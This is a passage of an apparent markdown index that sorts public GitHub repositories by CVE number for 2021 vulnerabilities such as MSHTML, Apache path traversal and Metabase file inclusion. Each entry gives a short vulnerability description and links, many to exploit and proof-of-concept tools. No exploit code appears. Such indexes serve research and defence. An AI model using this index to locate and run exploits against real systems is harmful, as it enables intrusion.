user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.</p>\n<p>Microsoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: “Suspicious Cpl File Execution”.</p>\n<p>Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.</p>\n<p>Please see the <strong>Mitigations</strong> and <strong>Workaround</strong> sections for important information about steps you can take to protect your system from this vulnerability.</p>\n<p><strong>UPDATE</strong> September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. Please see the FAQ for important information about which updates are applicable to your system.</p>\n + + +- [ozergoker/CVE-2021-40444](https://github.com/ozergoker/CVE-2021-40444) +- [DarkSprings/CVE-2021-40444](https://github.com/DarkSprings/CVE-2021-40444) +- [rfcxv/CVE-2021-40444-POC](https://github.com/rfcxv/CVE-2021-40444-POC) +- [bambooqj/CVE-2021-40444_EXP_JS](https://github.com/bambooqj/CVE-2021-40444_EXP_JS) +- [Immersive-Labs-Sec/cve-2021-40444-analysis](https://github.com/Immersive-Labs-Sec/cve-2021-40444-analysis) +- [vysecurity/CVE-2021-40444](https://github.com/vysecurity/CVE-2021-40444) +- [k4k4/CVE-2021-40444-Sample](https://github.com/k4k4/CVE-2021-40444-Sample) +- [lockedbyte/CVE-2021-40444](https://github.com/lockedbyte/CVE-2021-40444) +- [fengjixuchui/CVE-2021-40444-docx-Generate](https://github.com/fengjixuchui/CVE-2021-40444-docx-Generate) +- [KnoooW/CVE-2021-40444-docx-Generate](https://github.com/KnoooW/CVE-2021-40444-docx-Generate) +- [mansk1es/Caboom](https://github.com/mansk1es/Caboom) +- [jamesrep/cve-2021-40444](https://github.com/jamesrep/cve-2021-40444) +- [W1kyri3/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx](https://github.com/W1kyri3/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx) +- [aslitsecurity/CVE-2021-40444_builders](https://github.com/aslitsecurity/CVE-2021-40444_builders) +- [khoaduynu/CVE-2021-40444](https://github.com/khoaduynu/CVE-2021-40444) +- [Jeromeyoung/MSHTMHell](https://github.com/Jeromeyoung/MSHTMHell) +- [k8gege/CVE-2021-40444](https://github.com/k8gege/CVE-2021-40444) +- [klezVirus/CVE-2021-40444](https://github.com/klezVirus/CVE-2021-40444) +- [Phuong39/CVE-2021-40444-CAB](https://github.com/Phuong39/CVE-2021-40444-CAB) +- [Edubr2020/CVE-2021-40444--CABless](https://github.com/Edubr2020/CVE-2021-40444--CABless) +- [kal1gh0st/CVE-2021-40444_CAB_archives](https://github.com/kal1gh0st/CVE-2021-40444_CAB_archives) +- [LazarusReborn/Docx-Exploit-2021](https://github.com/LazarusReborn/Docx-Exploit-2021) +- [H0j3n/CVE-2021-40444](https://github.com/H0j3n/CVE-2021-40444) +- [metehangenel/MSHTML-CVE-2021-40444](https://github.com/metehangenel/MSHTML-CVE-2021-40444) +- [Jeromeyoung/TIC4301_Project](https://github.com/Jeromeyoung/TIC4301_Project) +- [tiagob0b/CVE-2021-40444](https://github.com/tiagob0b/CVE-2021-40444) +- [kagura-maru/CVE-2021-40444-POC](https://github.com/kagura-maru/CVE-2021-40444-POC) +- [Zeop-CyberSec/word_mshtml](https://github.com/Zeop-CyberSec/word_mshtml) +- [Alexcot25051999/CVE-2021-40444](https://github.com/Alexcot25051999/CVE-2021-40444) +- [lisinan988/CVE-2021-40444-exp](https://github.com/lisinan988/CVE-2021-40444-exp) +- [34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit](https://github.com/34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit) +- [MRacumen/CVE-2021-40444](https://github.com/MRacumen/CVE-2021-40444) +- [RedLeavesChilde/CVE-2021-40444](https://github.com/RedLeavesChilde/CVE-2021-40444) +- [nvchungkma/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-](https://github.com/nvchungkma/CVE-2021-40444-Microsoft-Office-Word-Remote-Code-Execution-) +- [hqdat809/CVE-2021-40444](https://github.com/hqdat809/CVE-2021-40444) +- [basim-ahmad/Follina-CVE-and-CVE-2021-40444](https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444) + +### CVE-2021-40449 (2021-10-13) + +Win32k Elevation of Privilege Vulnerability + + +- [ly4k/CallbackHell](https://github.com/ly4k/CallbackHell) +- [KaLendsi/CVE-2021-40449-Exploit](https://github.com/KaLendsi/CVE-2021-40449-Exploit) +- [hakivvi/CVE-2021-40449](https://github.com/hakivvi/CVE-2021-40449) +- [Kristal-g/CVE-2021-40449_poc](https://github.com/Kristal-g/CVE-2021-40449_poc) +- [CppXL/cve-2021-40449-poc](https://github.com/CppXL/cve-2021-40449-poc) +- [BL0odz/CVE-2021-40449-NtGdiResetDC-UAF](https://github.com/BL0odz/CVE-2021-40449-NtGdiResetDC-UAF) +- [SamuelTulach/voidmap](https://github.com/SamuelTulach/voidmap) +- [toanthang1842002/CVE-2021-40449](https://github.com/toanthang1842002/CVE-2021-40449) + +### CVE-2021-40492 (2021-09-03) + +A reflected XSS vulnerability exists in multiple pages in version 22 of the Gibbon application that allows for arbitrary execution of JavaScript (gibbonCourseClassID, gibbonPersonID, subpage, currentDate, or allStudents to index.php). + + +- [5qu1n7/CVE-2021-40492](https://github.com/5qu1n7/CVE-2021-40492) + +### CVE-2021-40512 +- [war4uthor/CVE-2021-40512](https://github.com/war4uthor/CVE-2021-40512) + +### CVE-2021-40513 +- [war4uthor/CVE-2021-40513](https://github.com/war4uthor/CVE-2021-40513) + +### CVE-2021-40514 +- [war4uthor/CVE-2021-40514](https://github.com/war4uthor/CVE-2021-40514) + +### CVE-2021-40531 (2021-09-06) + +Sketch before 75 allows library feeds to be used to bypass file quarantine. Files are automatically downloaded and opened, without the com.apple.quarantine extended attribute. This results in remote code execution, as demonstrated by CommandString in a terminal profile to Terminal.app. + + +- [jonpalmisc/CVE-2021-40531](https://github.com/jonpalmisc/CVE-2021-40531) + +### CVE-2021-40539 (2021-09-07) + +Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. + + +- [DarkSprings/CVE-2021-40539](https://github.com/DarkSprings/CVE-2021-40539) +- [synacktiv/CVE-2021-40539](https://github.com/synacktiv/CVE-2021-40539) +- [lpyzds/CVE-2021-40539](https://github.com/lpyzds/CVE-2021-40539) +- [lpyydxs/CVE-2021-40539](https://github.com/lpyydxs/CVE-2021-40539) +- [Bu0uCat/ADSelfService-Plus-RCE-CVE-2021-40539](https://github.com/Bu0uCat/ADSelfService-Plus-RCE-CVE-2021-40539) + +### CVE-2021-40822 (2022-05-01) + +GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows SSRF via the option for setting a proxy host. + + +- [phor3nsic/CVE-2021-40822](https://github.com/phor3nsic/CVE-2021-40822) + +### CVE-2021-40839 (2021-09-10) + +The rencode package through 1.0.6 for Python allows an infinite loop in typecode decoding (such as via ;\x2f\x7f), enabling a remote attack that consumes CPU and memory. + + +- [itlabbet/CVE-2021-40839](https://github.com/itlabbet/CVE-2021-40839) + +### CVE-2021-40845 (2021-09-15) + +The web part of Zenitel AlphaCom XE Audio Server through 11.2.3.10, called AlphaWeb XE, does not restrict file upload in the Custom Scripts section at php/index.php. Neither the content nor extension of the uploaded files is checked, allowing execution of PHP code under the /cmd directory. + + +- [ricardojoserf/CVE-2021-40845](https://github.com/ricardojoserf/CVE-2021-40845) + +### CVE-2021-40859 (2021-12-07) + +Backdoors were discovered in Auerswald COMpact 5500R 7.8A and 8.0B devices, that allow attackers with access to the web based management application full administrative access to the device. + + +- [419066074/CVE-2021-40859](https://github.com/419066074/CVE-2021-40859) +- [0xr001/CVE-2021-40859](https://github.com/0xr001/CVE-2021-40859) +- [pussycat0x/CVE-2021-40859](https://github.com/pussycat0x/CVE-2021-40859) + +### CVE-2021-40865 (2021-10-25) + +An Unsafe Deserialization vulnerability exists in the worker services of the Apache Storm supervisor server allowing pre-auth Remote Code Execution (RCE). Apache Storm 2.2.x users should upgrade to version 2.2.1 or 2.3.0. Apache Storm 2.1.x users should upgrade to version 2.1.1. Apache Storm 1.x users should upgrade to version 1.2.4 + + +- [hktalent/CVE-2021-40865](https://github.com/hktalent/CVE-2021-40865) + +### CVE-2021-40870 (2021-09-13) + +An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal. + + +- [System00-Security/CVE-2021-40870](https://github.com/System00-Security/CVE-2021-40870) +- [0xAgun/CVE-2021-40870](https://github.com/0xAgun/CVE-2021-40870) +- [orangmuda/CVE-2021-40870](https://github.com/orangmuda/CVE-2021-40870) +- [JoyGhoshs/CVE-2021-40870](https://github.com/JoyGhoshs/CVE-2021-40870) + +### CVE-2021-40875 (2021-09-22) + +Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data. + + +- [SakuraSamuraii/derailed](https://github.com/SakuraSamuraii/derailed) +- [Lul/TestRail-files.md5-IAC-scanner](https://github.com/Lul/TestRail-files.md5-IAC-scanner) + +### CVE-2021-40903 (2022-06-17) + +A vulnerability in Antminer Monitor 0.50.0 exists because of backdoor or misconfiguration inside a settings file in flask server. Settings file has a predefined secret string, which would be randomly generated, however it is static. + + +- [vulnz/CVE-2021-40903](https://github.com/vulnz/CVE-2021-40903) + +### CVE-2021-40904 (2022-03-25) + +The web management console of CheckMK Raw Edition (versions 1.5.0 to 1.6.0) allows a misconfiguration of the web-app Dokuwiki (installed by default), which allows embedded php code. As a result, remote code execution is achieved. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session by a user with the role of administrator. + + +- [Edgarloyola/CVE-2021-40904](https://github.com/Edgarloyola/CVE-2021-40904) + +### CVE-2021-40905 (2022-03-25) + +The web management console of CheckMK Enterprise Edition (versions 1.5.0 to 2.0.0p9) does not properly sanitise the uploading of ".mkp" files, which are Extension Packages, making remote code execution possible. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session of a user with administrator role. NOTE: the vendor states that this is the intended behavior: admins are supposed to be able to execute code in this manner + + +- [Edgarloyola/CVE-2021-40905](https://github.com/Edgarloyola/CVE-2021-40905) + +### CVE-2021-40906 (2022-03-25) + +CheckMK Raw Edition software (versions 1.5.0 to 1.6.0) does not sanitise the input of a web service parameter that is in an unauthenticated zone. This Reflected XSS allows an attacker to open a backdoor on the device with HTML content and interpreted by the browser (such as JavaScript or other client-side scripts) or to steal the session cookies of a user who has previously authenticated via a man in the middle. Successful exploitation requires access to the web service resource without authentication. + + +- [Edgarloyola/CVE-2021-40906](https://github.com/Edgarloyola/CVE-2021-40906) + +### CVE-2021-40978 (2021-10-07) + +The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1 + + +- [nisdn/CVE-2021-40978](https://github.com/nisdn/CVE-2021-40978) + +### CVE-2021-41073 (2021-09-19) + +loop_rw_iter in fs/io_uring.c in the Linux kernel 5.10 through 5.14.6 allows local users to gain privileges by using IORING_OP_PROVIDE_BUFFERS to trigger a free of a kernel buffer, as demonstrated by using /proc/<pid>/maps for exploitation. + + +- [chompie1337/Linux_LPE_io_uring_CVE-2021-41073](https://github.com/chompie1337/Linux_LPE_io_uring_CVE-2021-41073) + +### CVE-2021-41074 +- [dillonkirsch/CVE-2021-41074](https://github.com/dillonkirsch/CVE-2021-41074) + +### CVE-2021-41078 (2021-10-26) + +Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file. + + +- [s-index/CVE-2021-41078](https://github.com/s-index/CVE-2021-41078) + +### CVE-2021-41081 (2021-11-11) + +Zoho ManageEngine Network Configuration Manager before 125465 is vulnerable to SQL Injection in a configuration search. + + +- [sudaiv/CVE-2021-41081](https://github.com/sudaiv/CVE-2021-41081) + +### CVE-2021-41091 (2021-10-04) + +Moby is an open-source project created by Docker to enable software containerization. A bug was found in Moby (Docker Engine) where the data directory (typically `/var/lib/docker`) contained subdirectories with insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as `setuid`), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files. This bug has been fixed in Moby (Docker Engine) 20.10.9. Users should update to this version as soon as possible. Running containers should be stopped and restarted for the permissions to be fixed. For users unable to upgrade limit access to the host to trusted users. Limit access to host volumes to trusted containers. + + +- [UncleJ4ck/CVE-2021-41091](https://github.com/UncleJ4ck/CVE-2021-41091) +- [jrbH4CK/CVE-2021-41091](https://github.com/jrbH4CK/CVE-2021-41091) +- [SNE-M23-SN/Vulnerable-Docker-Engine](https://github.com/SNE-M23-SN/Vulnerable-Docker-Engine) + +### CVE-2021-41117 (2021-10-11) + +keypair is a a RSA PEM key generator written in javascript. keypair implements a lot of cryptographic primitives on its own or by borrowing from other libraries where possible, including node-forge. An issue was discovered where this library was generating identical RSA keys used in SSH. This would mean that the library is generating identical P, Q (and thus N) values which, in practical terms, is impossible with RSA-2048 keys. Generating identical values, repeatedly, usually indicates an issue with poor random number generation, or, poor handling of CSPRNG output. Issue 1: Poor random number generation (`GHSL-2021-1012`). The library does not rely entirely on a platform provided CSPRNG, rather, it uses it's own counter-based CMAC approach. Where things go wrong is seeding the CMAC implementation with "true" random data in the function `defaultSeedFile`. In order to seed the AES-CMAC generator, the library will take two different approaches depending on the JavaScript execution environment. In a browser, the library will use [`window.crypto.getRandomValues()`](https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L971). However, in a nodeJS execution environment, the `window` object is not defined, so it goes down a much less secure solution, also of which has a bug in it. It does look like the library tries to use node's CSPRNG when possible unfortunately, it looks like the `crypto` object is null because a variable was declared with the same name, and set to `null`. So the node CSPRNG path is never taken. However, when `window.crypto.getRandomValues()` is not available, a Lehmer LCG random number generator is used to seed the CMAC counter, and the LCG is seeded with `Math.random`. While this is poor and would likely qualify in a security bug in itself, it does not explain the extreme frequency in which duplicate keys occur. The main flaw: The output from the Lehmer LCG is encoded incorrectly. The specific [line][https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L1008] with the flaw is: `b.putByte(String.fromCharCode(next & 0xFF))` The [definition](https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L350-L352) of `putByte` is `util.ByteBuffer.prototype.putByte = function(b) {this.data += String.fromCharCode(b);};`. Simplified, this is `String.fromCharCode(String.fromCharCode(next & 0xFF))`. The double `String.fromCharCode` is almost certainly unintentional and the source of weak seeding. Unfortunately, this does not result in an error. Rather, it results most of the buffer containing zeros. Since we are masking with 0xFF, we can determine that 97% of the output from the LCG are converted to zeros. The only outputs that result in meaningful values are outputs 48 through 57, inclusive. The impact is that each byte in the RNG seed has a 97% chance of being 0 due to incorrect conversion. When it is not, the bytes are 0 through 9. In summary, there are three immediate concerns: 1. The library has an insecure random number fallback path. Ideally the library would require a strong CSPRNG instead of attempting to use a LCG and `Math.random`. 2. The library does not correctly use a strong random number generator when run in NodeJS, even though a strong CSPRNG is available. 3. The fallback path has an issue in the implementation where a majority of the seed data is going to effectively be zero. Due to the poor random number generation, keypair generates RSA keys that are relatively easy to guess. This could enable an attacker to decrypt confidential messages or gain authorized access to an account belonging to the victim. + + +- [badkeys/keypairvuln](https://github.com/badkeys/keypairvuln) + +### CVE-2021-41160 (2021-10-21) + +FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions a malicious server might trigger out of bound writes in a connected client. Connections using GDI or SurfaceCommands to send graphics updates to the client might send `0` width/height or out of bound rectangles to trigger out of bound writes. With `0` width or heigth the memory allocation will be `0` but the missing bounds checks allow writing to the pointer at this (not allocated) region. This issue has been patched in FreeRDP 2.4.1. + + +- [Jajangjaman/CVE-2021-41160](https://github.com/Jajangjaman/CVE-2021-41160) + +### CVE-2021-41182 (2021-10-26) + +jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of the `altField` option of the Datepicker widget from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `altField` option is now treated as a CSS selector. A workaround is to not accept the value of the `altField` option from untrusted sources. + + +- [aredspy/CVE-2021-41182](https://github.com/aredspy/CVE-2021-41182) +- [aredspy/CVE-2021-41182-Tester](https://github.com/aredspy/CVE-2021-41182-Tester) + +### CVE-2021-41184 (2021-10-26) + +jQuery-UI is the official jQuery user interface library. Prior to version 1.13.0, accepting the value of the `of` option of the `.position()` util from untrusted sources may execute untrusted code. The issue is fixed in jQuery UI 1.13.0. Any string value passed to the `of` option is now treated as a CSS selector. A workaround is to not accept the value of the `of` option from untrusted sources. + + +- [gabrielolivra/Exploit-Medium-CVE-2021-41184](https://github.com/gabrielolivra/Exploit-Medium-CVE-2021-41184) + +### CVE-2021-41277 (2021-11-17) + +Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application. + + +- [Seals6/CVE-2021-41277](https://github.com/Seals6/CVE-2021-41277) +- [tahtaciburak/CVE-2021-41277](https://github.com/tahtaciburak/CVE-2021-41277) +- [Henry4E36/Metabase-cve-2021-41277](https://github.com/Henry4E36/Metabase-cve-2021-41277) +- [kap1ush0n/CVE-2021-41277](https://github.com/kap1ush0n/CVE-2021-41277) +- [z3n70/CVE-2021-41277](https://github.com/z3n70/CVE-2021-41277) +- [kaizensecurity/CVE-2021-41277](https://github.com/kaizensecurity/CVE-2021-41277) +- [Vulnmachines/Metabase_CVE-2021-41277](https://github.com/Vulnmachines/Metabase_CVE-2021-41277) +- [TheLastVvV/CVE-2021-41277](https://github.com/TheLastVvV/CVE-2021-41277) +- [zer0yu/CVE-2021-41277](https://github.com/zer0yu/CVE-2021-41277) +- [frknktlca/Metabase_Nmap_Script](https://github.com/frknktlca/Metabase_Nmap_Script) +- [chengling-ing/CVE-2021-41277](https://github.com/chengling-ing/CVE-2021-41277) +- [RubXkuB/PoC-Metabase-CVE-2021-41277](https://github.com/RubXkuB/PoC-Metabase-CVE-2021-41277) + +### CVE-2021-41338 (2021-10-13) + +Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability + + +- [Mario-Kart-Felix/firewall-cve](https://github.com/Mario-Kart-Felix/firewall-cve) + +### CVE-2021-41349 (2021-11-10) + +Microsoft Exchange Server Spoofing Vulnerability + + +- [0xrobiul/CVE-2021-41349](https://github.com/0xrobiul/CVE-2021-41349) + +### CVE-2021-41351 (2021-11-10) + +Microsoft Edge (Chrome based) Spoofing on IE Mode + + +- [JaneMandy/CVE-2021-41351-POC](https://github.com/JaneMandy/CVE-2021-41351-POC) + +### CVE-2021-41381 (2021-09-23) + +Payara Micro Community 5.2021.6 and below allows Directory Traversal. + + +- [Net-hunter121/CVE-2021-41381](https://github.com/Net-hunter121/CVE-2021-41381) + +### CVE-2021-41511 (2021-10-04) + +The username and password field of login in Lodging Reservation Management System V1 can give access to any user by using SQL injection to bypass authentication. + + +- [vidvansh/CVE-2021-41511](https://github.com/vidvansh/CVE-2021-41511) + +### CVE-2021-41560 (2021-12-15) + +OpenCATS through 0.9.6 allows remote attackers to execute arbitrary code by uploading an executable file via lib/FileUtility.php. + + +- [Nickguitar/RevCAT](https://github.com/Nickguitar/RevCAT) + +### CVE-2021-41643 (2021-10-29) + +Remote Code Execution (RCE) vulnerability exists in Sourcecodester Church Management System 1.0 via the image upload field. + + +- [hax3xploit/CVE-2021-41643](https://github.com/hax3xploit/CVE-2021-41643) + +### CVE-2021-41644 (2021-10-29) + +Remote Code Exection (RCE) vulnerability exists in Sourcecodester Online Food Ordering System 2.0 via a maliciously crafted PHP file that bypasses the image upload filters. + + +- [hax3xploit/CVE-2021-41644](https://github.com/hax3xploit/CVE-2021-41644) + +### CVE-2021-41645 (2021-10-29) + +Remote Code Execution (RCE) vulnerability exists in Sourcecodester Budget and Expense Tracker System 1.0 that allows a remote malicious user to inject arbitrary code via the image upload field. . + + +- [hax3xploit/CVE-2021-41645](https://github.com/hax3xploit/CVE-2021-41645) + +### CVE-2021-41646 (2021-10-29) + +Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Reviewer System 1.0 by uploading a maliciously crafted PHP file that bypasses the image upload filters.. + + +- [hax3xploit/CVE-2021-41646](https://github.com/hax3xploit/CVE-2021-41646) + +### CVE-2021-41647 (2021-10-01) + +An un-authenticated error-based and time-based blind SQL injection vulnerability exists in Kaushik Jadhav Online Food Ordering Web App 1.0. An attacker can exploit the vulnerable "username" parameter in login.php and retrieve sensitive database information, as well as add an administrative user. + + +- [MobiusBinary/CVE-2021-41647](https://github.com/MobiusBinary/CVE-2021-41647) + +### CVE-2021-41648 (2021-10-01) + +An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input. + + +- [MobiusBinary/CVE-2021-41648](https://github.com/MobiusBinary/CVE-2021-41648) + +### CVE-2021-41649 (2021-10-01) + +An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. + + +- [MobiusBinary/CVE-2021-41649](https://github.com/MobiusBinary/CVE-2021-41649) + +### CVE-2021-41651 (2021-10-04) + +A blind SQL injection vulnerability exists in the Raymart DG / Ahmed Helal Hotel-mgmt-system. A malicious attacker can retrieve sensitive database information and interact with the database using the vulnerable cid parameter in process_update_profile.php. + + +- [MobiusBinary/CVE-2021-41651](https://github.com/MobiusBinary/CVE-2021-41651) + +### CVE-2021-41653 (2021-11-13) + +The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field. + + +- [likeww/CVE-2021-41653](https://github.com/likeww/CVE-2021-41653) + +### CVE-2021-41703 +- [Yanoro/CVE-2021-41703](https://github.com/Yanoro/CVE-2021-41703) + +### CVE-2021-41730 +- [yezeting/CVE-2021-41730](https://github.com/yezeting/CVE-2021-41730) + +### CVE-2021-41773 (2021-10-05) + +A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. + + +- [Vulnmachines/cve-2021-41773](https://github.com/Vulnmachines/cve-2021-41773) +- [numanturle/CVE-2021-41773](https://github.com/numanturle/CVE-2021-41773) +- [knqyf263/CVE-2021-41773](https://github.com/knqyf263/CVE-2021-41773) +- [ZephrFish/CVE-2021-41773-PoC](https://github.com/ZephrFish/CVE-2021-41773-PoC) +- [iilegacyyii/PoC-CVE-2021-41773](https://github.com/iilegacyyii/PoC-CVE-2021-41773) +- [masahiro331/CVE-2021-41773](https://github.com/masahiro331/CVE-2021-41773) +- [j4k0m/CVE-2021-41773](https://github.com/j4k0m/CVE-2021-41773) +- [TishcaTpx/POC-CVE-2021-41773](https://github.com/TishcaTpx/POC-CVE-2021-41773) +- [lorddemon/CVE-2021-41773-PoC](https://github.com/lorddemon/CVE-2021-41773-PoC) +- [Ls4ss/CVE-2021-41773_CVE-2021-42013](https://github.com/Ls4ss/CVE-2021-41773_CVE-2021-42013) +- [itsecurityco/CVE-2021-41773](https://github.com/itsecurityco/CVE-2021-41773) +- [habibiefaried/CVE-2021-41773-PoC](https://github.com/habibiefaried/CVE-2021-41773-PoC) +- [creadpag/CVE-2021-41773-POC](https://github.com/creadpag/CVE-2021-41773-POC) +- [TAI-REx/cve-2021-41773-nse](https://github.com/TAI-REx/cve-2021-41773-nse) +- [blasty/CVE-2021-41773](https://github.com/blasty/CVE-2021-41773) +- [PentesterGuruji/CVE-2021-41773](https://github.com/PentesterGuruji/CVE-2021-41773) +- [jbovet/CVE-2021-41773](https://github.com/jbovet/CVE-2021-41773) +- [mohwahyudi/cve-2021-41773](https://github.com/mohwahyudi/cve-2021-41773) +- [1nhann/CVE-2021-41773](https://github.com/1nhann/CVE-2021-41773) +- [ranggaggngntt/CVE-2021-41773](https://github.com/ranggaggngntt/CVE-2021-41773) +- [BlueTeamSteve/CVE-2021-41773](https://github.com/BlueTeamSteve/CVE-2021-41773) +- [Zeop-CyberSec/apache_normalize_path](https://github.com/Zeop-CyberSec/apache_normalize_path) +- [r00tVen0m/CVE-2021-41773](https://github.com/r00tVen0m/CVE-2021-41773) +- [n3k00n3/CVE-2021-41773](https://github.com/n3k00n3/CVE-2021-41773) +- [fnatalucci/CVE-2021-41773-RCE](https://github.com/fnatalucci/CVE-2021-41773-RCE) +- [AssassinUKG/CVE-2021-41773](https://github.com/AssassinUKG/CVE-2021-41773) +- [jheeree/Simple-CVE-2021-41773-checker](https://github.com/jheeree/Simple-CVE-2021-41773-checker) +- [orangmuda/CVE-2021-41773](https://github.com/orangmuda/CVE-2021-41773) +- [HightechSec/scarce-apache2](https://github.com/HightechSec/scarce-apache2) +- [vinhjaxt/CVE-2021-41773-exploit](https://github.com/vinhjaxt/CVE-2021-41773-exploit) +- [sixpacksecurity/CVE-2021-41773](https://github.com/sixpacksecurity/CVE-2021-41773) +- [Hattan515/POC-CVE-2021-41773](https://github.com/Hattan515/POC-CVE-2021-41773) +- [twseptian/cve-2021-41773](https://github.com/twseptian/cve-2021-41773) +- [noflowpls/CVE-2021-41773](https://github.com/noflowpls/CVE-2021-41773) +- [McSl0vv/CVE-2021-41773](https://github.com/McSl0vv/CVE-2021-41773) +- [shiomiyan/CVE-2021-41773](https://github.com/shiomiyan/CVE-2021-41773) +- [justakazh/mass_cve-2021-41773](https://github.com/justakazh/mass_cve-2021-41773) +- [shellreaper/CVE-2021-41773](https://github.com/shellreaper/CVE-2021-41773) +- [0xRar/CVE-2021-41773](https://github.com/0xRar/CVE-2021-41773) +- [pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt) +- [corelight/CVE-2021-41773](https://github.com/corelight/CVE-2021-41773) +- [zeronine9/CVE-2021-41773](https://github.com/zeronine9/CVE-2021-41773) +- [b1tsec/CVE-2021-41773](https://github.com/b1tsec/CVE-2021-41773) +- [superzerosec/CVE-2021-41773](https://github.com/superzerosec/CVE-2021-41773) +- [im-hanzou/apachrot](https://github.com/im-hanzou/apachrot) +- [inbug-team/CVE-2021-41773_CVE-2021-42013](https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013) +- [5gstudent/cve-2021-41773-and-cve-2021-42013](https://github.com/5gstudent/cve-2021-41773-and-cve-2021-42013) +- [EagleTube/CVE-2021-41773](https://github.com/EagleTube/CVE-2021-41773) +- [apapedulimu/Apachuk](https://github.com/apapedulimu/Apachuk) +- [scarmandef/CVE-2021-41773](https://github.com/scarmandef/CVE-2021-41773) +- [ksanchezcld/httpd-2.4.49](https://github.com/ksanchezcld/httpd-2.4.49) +- [MrCl0wnLab/SimplesApachePathTraversal](https://github.com/MrCl0wnLab/SimplesApachePathTraversal) +- [theLSA/apache-httpd-path-traversal-checker](https://github.com/theLSA/apache-httpd-path-traversal-checker) +- [LudovicPatho/CVE-2021-41773](https://github.com/LudovicPatho/CVE-2021-41773) +- [lopqto/CVE-2021-41773_Honeypot](https://github.com/lopqto/CVE-2021-41773_Honeypot) +- [zerodaywolf/CVE-2021-41773_42013](https://github.com/zerodaywolf/CVE-2021-41773_42013) +- [LayarKacaSiber/CVE-2021-41773](https://github.com/LayarKacaSiber/CVE-2021-41773) +- [BabyTeam1024/CVE-2021-41773](https://github.com/BabyTeam1024/CVE-2021-41773) +- [walnutsecurity/cve-2021-41773](https://github.com/walnutsecurity/cve-2021-41773) +- [TheLastVvV/CVE-2021-41773](https://github.com/TheLastVvV/CVE-2021-41773) +- [MazX0p/CVE-2021-41773](https://github.com/MazX0p/CVE-2021-41773) +- [vida003/Scanner-CVE-2021-41773](https://github.com/vida003/Scanner-CVE-2021-41773) +- [mr-exo/CVE-2021-41773](https://github.com/mr-exo/CVE-2021-41773) +- [wolf1892/CVE-2021-41773](https://github.com/wolf1892/CVE-2021-41773) +- [Hydragyrum/CVE-2021-41773-Playground](https://github.com/Hydragyrum/CVE-2021-41773-Playground) +- [IcmpOff/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit](https://github.com/IcmpOff/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit) +- 